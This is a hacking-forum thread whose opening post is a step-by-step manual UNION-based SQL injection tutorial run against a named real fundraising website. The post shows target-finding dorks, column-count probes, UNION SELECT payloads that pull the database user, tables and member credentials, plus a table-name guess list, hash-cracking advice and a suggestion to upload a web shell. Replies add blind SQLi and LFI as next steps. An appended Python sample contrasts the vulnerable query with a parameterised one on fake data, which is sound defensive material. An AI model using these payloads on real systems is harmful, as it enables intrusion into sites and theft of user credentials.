Tutorial: Manual SQL injection with example :)
Manual SQL injection with example :) #1
Assalamu alaikum
What we are going to learn today is what we call UNION-based SQL injection.

First you want to find a vulnerable site using SQL dorks
like this:
"inurl:index.php/id="
Step 1: Finding the vulnerability in a website
Many links look like this:
http://www.fundraisingnetwork.info/artca....php?id=22

So you put a single quote (') at the end.

The link becomes:
http://www.fundraisingnetwork.info/artca....php?id=22'

If you get the error, then the site is vulnerable; the link I provided is vulnerable.

Step 2: Finding the number of columns a website has
Now we need to find the number of columns by adding at the end of the link:
order by x-- (where 'x' is a random integer)
So the link becomes like this:
http://www.fundraisingnetwork.info/artca....php?id=22 order by 1-- (no error)
http://www.fundraisingnetwork.info/artca....php?id=22 order by 2-- (no error)
http://www.fundraisingnetwork.info/artca....php?id=22 order by 8-- (no error)

and so on.
We increase the number until we get the error:

http://www.fundraisingnetwork.info/artca....php?id=22 order by 9--

Here we get the error, so now we know that the number of columns is 8.

Step 3: Now that we have found the number of columns, it's time to execute the UNION SELECT statement

If we perform the UNION SELECT statement, we can get both user and admin information from their database.
The point is that UNION SELECT returns our results with the information we need.
If you want to find vulnerable columns, use UNION SELECT.
If you want to find the version of the database, UNION SELECT.
If you want admin information, use UNION SELECT!
Alright, now that we know something about the UNION function, let's continue.

Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's what our query will look like:

http://www.fundraisingnetwork.info/artca....php?id=22 UNION SELECT 1,2,3,4,5,6,7,8--


This is what you would normally do if you use the UNION function while SQL injecting a website.

Focus on something like this: "index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string and "N" is the number of columns, followed by two hyphens "--", and another hyphen "-" beside "X".

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,5,6,7,8--


Step 4: Random numbers appear on screen, the next step

Here you'll find a bunch of numbers showing up on the screen.
These are known as "vulnerable columns", which means that those vulnerable columns have stored data inside them that we need to extract.

In my given site you saw 5 and 7.
You need to inject the number at the very top (always at the very top).
So, in this case we have number "5".
Now you might be asking, what can I do with a vulnerable column?
Well, here's what you can get: INFORMATION!
You need a lot of information to study from the website; here are a couple of examples.

Replace the vulnerable column, i.e. number 5, with a statement:

group_concat(CHAR(32,58,32),user(),database(),version())

user() = find the user information
version() = find the version of the database
database() = find the current database

The link becomes:

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

tfnprimary2012@184.168.27.57 : tfnprimary2012 : 5.0.96-log
user()=tfnprimary2012@184.168.27.57
database()=tfnprimary2012
version()=5.0.96-log

So the database version is 5, which is good because it'll be easier to SQL inject the website.
Note:
Database version less than 5 ("<5") = you need to guess tables (a bit of hard work)
Database version greater than 5 (">5") = easy to inject with another function, i.e. group_concat

If you ever want to SQLi a website with version <5, then you can guess the tables with the following list:
Code:
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin

We now have almost all the information there is about the website.
Look closely here: we used a command, "group_concat".
Here's its function:
group_concat = gets all the information at once, i.e. grouping it with the help of statements. Ex. group_concat(database())
Note: group_concat won't work with versions less than 5.

Step 5: Getting the table names

Alright, first let's look up some functions we're gonna use to extract table names (important):
group_concat = groups data up into a specific statement
table_name = table names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a hex code that creates a new line for organizing tables in order
Now let's combine those functions and make up a query that will give us the table names.
So, here's what our link will look like:

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--

Here, we replaced our vulnerable column with "group_concat(table_name)"
and then we added
"from information_schema.tables where table_schema=database()--"
after the last column (excluding the two hyphens after 11).
Results on table names:

content_art_articles,content_art_authors,content_art_categories,content_art_listings_spon,content_art_rotations,core_categories,core_listings_free,core_listings_spon,membership_grouppermissions,membership_groups,membership_userpermissions,membership_userrecords,membership_users,salesleads,salesleads_comm,salesleads_infotypes,salesleads_list

Alright, now that we've found the tables, what you're gonna have to do is
find the tables where user/admin information is stored.
In this case, "membership_users" seems to have admin information stored in it.
It's all about predicting and expecting what's behind every table you see.
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and add the following:
Vulnerable column = replace
"(table_name)" with "(column_name)"
&
"from information_schema.tables where table_schema=database()--" with
"from information_schema.columns where table_name=membership_users--"

If nothing happens, then convert 'membership_users' to hex
using
http://www.swingnote.com/tools/texttohex.php

membership_users = 6d656d626572736869705f7573657273

Remember to add 0x before 6d656d626572736869705f7573657273.

So the link becomes:

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x6d656d626572736869705f7573657273--

The columns of that table are:

memberID,passMD5,email,signupDate,groupID,isBanned,isApproved,custom1,custom2,custom3,custom4,comments

We need only
memberID,passMD5,email

Step 6: Getting data from columns

Alright, let's extract the information.
Look closely at the syntax:

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,group_concat(memberID,0x3a,passMD5,0x3a,email,0x3a),6,7,8 from membership_users--


Keep this formula-like syntax in mind whenever you want to extract data from columns:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat(columnName,0x3a,columnName,0x0a) from tablename--

Where "X" is a random integer/string followed by a hyphen (-), "N" is the number/position of the column, "columnName" is the column you want to extract data from, and "tablename" is the table you extract the data from, followed by two hyphens at the end (--).

column names = (memberID,passMD5,email)
separator = 0x3a (the hex for a colon ":")
table name = membership_users
Once you execute that syntax, you get the username and password separated by a colon.

Results after executing the syntax:



Bingo, we got the admin login details.

Now crack the MD5 hashes at
http://www.md5decrypter.co.uk/
We found the following:


Now find the admin login and upload the shell, and bingo.

Any questions relating to this tutorial, feel free to ask.

Regards,
U_!!v!!_N
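An added example, written from the defender's side and not taken from the post or the site it targets: the query pattern behind an `index.php?id=` lookup, rebuilt against an in-memory SQLite database, beside the parameterised version that stops the tutorial's probes. The table and column names (`articles`, `membership_users`, `memberID`, `passMD5`, `email`) are borrowed from the post; every row is constructed fake data.

```python
import sqlite3

# Constructed demo schema: the names echo the tutorial's tables, the data is fake.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (22, 'Fundraising tips', 'Article body');
        CREATE TABLE membership_users(memberID TEXT, passMD5 TEXT, email TEXT);
        INSERT INTO membership_users VALUES
            ('admin', 'placeholder-hash-1', 'admin@example.invalid'),
            ('jo',    'placeholder-hash-2', 'jo@example.invalid');
    """)
    return con

def lookup_vulnerable(con: sqlite3.Connection, raw_id: str) -> list:
    """The pattern behind index.php?id=...: the parameter is pasted into the
    SQL string, so SQL keywords inside it become part of the query."""
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return con.execute(sql).fetchall()

def lookup_safe(con: sqlite3.Connection, raw_id: str) -> list:
    """Hardened form: validate the type, then bind the value as a parameter.
    Whatever the string contains, it is only ever compared as a number."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return con.execute(sql, (article_id,)).fetchall()

def order_by_probe_errors(con: sqlite3.Connection, n: int) -> bool:
    """Step 2 of the tutorial: 'order by n--' fails once n exceeds the column
    count, which is how the query width leaks on the vulnerable path."""
    try:
        lookup_vulnerable(con, f"22 order by {n}--")
        return False
    except sqlite3.OperationalError:
        return True

# Steps 3 and 6: a negative id matches no real article, so only the UNIONed
# rows come back; the SELECT must supply exactly three columns to match.
UNION_PAYLOAD = "-22 UNION SELECT memberID, passMD5, email FROM membership_users--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, UNION_PAYLOAD))  # dumps membership_users
    print("safe:      ", lookup_safe(db, UNION_PAYLOAD))        # []
```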

RE: Manual SQL injection with example :) #2
Nice tutorial. Also, you might want to add that these are the basics, because not all SQLi-vulnerable websites will work with this, but more advanced SQLi methods will.

RE: Manual SQL injection with example :) #3
Yes bro. Soon I will post an advanced tutorial with an example.

RE: Manual SQL injection with example :) #4
Thanks for the guide, well put together.


RE: Manual SQL injection with example :) #5
Thanks for this great tutorial.


RE: Manual SQL injection with example :) #6
Thanks for your feedback, fieldy2012 bro.

RE: Manual SQL injection with example :) #7
Sorry for the noob question, but is there any way around it if you don't get the SQL error in the first step?


RE: Manual SQL injection with example :) #8
(02-08-2013, 03:28 PM) jpjp333 Wrote: Sorry for the noob question, but is there any way around it if you don't get the SQL error in the first step?

Yes, but these are advanced. You can try whether it's vulnerable to a blind SQL injection, or perhaps it's vulnerable to another injection like LFI.


RE: Manual SQL injection with example :) #9
Then move on to other sites and use the different dorks available in this forum. Any queries?

RE: Manual SQL injection with example :) #10
(02-08-2013, 03:38 PM) INST1NCT Wrote:
(02-08-2013, 03:28 PM) jpjp333 Wrote: Sorry for the noob question, but is there any way around it if you don't get the SQL error in the first step?

Yes, but these are advanced. You can try whether it's vulnerable to a blind SQL injection, or perhaps it's vulnerable to another injection like LFI.

Ah, thanks.
